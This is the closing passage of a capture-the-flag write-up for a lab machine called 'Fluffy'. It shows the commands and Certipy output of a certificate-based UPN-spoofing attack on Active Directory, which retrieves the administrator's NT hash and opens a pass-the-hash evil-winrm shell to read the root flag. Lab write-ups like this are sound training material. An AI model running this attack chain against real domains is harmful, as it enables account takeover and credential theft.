Certipy v5.0.3 - by Oliver Lyak (ly4k)
[+] Nameserver: '10.129.164.91'
[+] DC IP: '10.129.164.91'
[+] DC Host: None
[+] Target IP: None
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: ''
[+] Username: 'ADMINISTRATOR'
[+] Trying to resolve 'DC01.fluffy.htb' at '10.129.164.91'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.129.164.91[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.164.91[\pipe\cert]
[*] Request ID is 15
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
[0x0539] > Changing the UPNs back to their proper users!
[0x0539] > Now we need to pay attention to an important detail so there is no conflict when we authenticate with the certificate. We have to set the UPN of the ca_svc account back to ca_svc@fluffy.htb, that is, its own UPN. That way the administrator keeps its own UPN, administrator@fluffy.htb, and ca_svc has ca_svc@fluffy.htb.
┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# certipy -debug account -username 'ca_svc' -hashes ':hash' -dc-ip 10.129.164.91 -ns 10.129.164.91 \
    -target DC01.fluffy.htb -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[+] Nameserver: '10.129.164.91'
[+] DC IP: '10.129.164.91'
[+] DC Host: 'DC01.fluffy.htb'
[+] Target IP: '10.129.164.91'
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: ''
[+] Username: 'CA_SVC'
[+] Authenticating to LDAP server using NTLM authentication
[+] Using NTLM signing: False (LDAP signing: True, SSL: True)
[+] Using channel binding signing: True (LDAP channel binding: True, SSL: True)
[+] Using LDAP channel binding for NTLM authentication
[+] LDAP NTLM authentication successful
[+] Bound to ldaps://10.129.164.91:636 - ssl
[+] Default path: DC=fluffy,DC=htb
[+] Configuration path: CN=Configuration,DC=fluffy,DC=htb
[*] Updating user 'ca_svc':
userPrincipalName : ca_svc@fluffy.htb
[*] Successfully updated 'ca_svc'
[0x0539] > Obtaining the administrator's hash and getting the r00t flag!
┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# certipy auth -pfx administrator.pfx -domain fluffy.htb -dc-ip 10.129.164.91
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': HASH_NTLM
┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# evil-winrm -i 10.129.164.91 -u 'administrator' -H 'hash'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../desktop/root.txt
1337_ROOT_:|
*Evil-WinRM* PS C:\Users\Administrator\Documents>
That wraps up another machine; I hope you learned something from this room.
See you next time!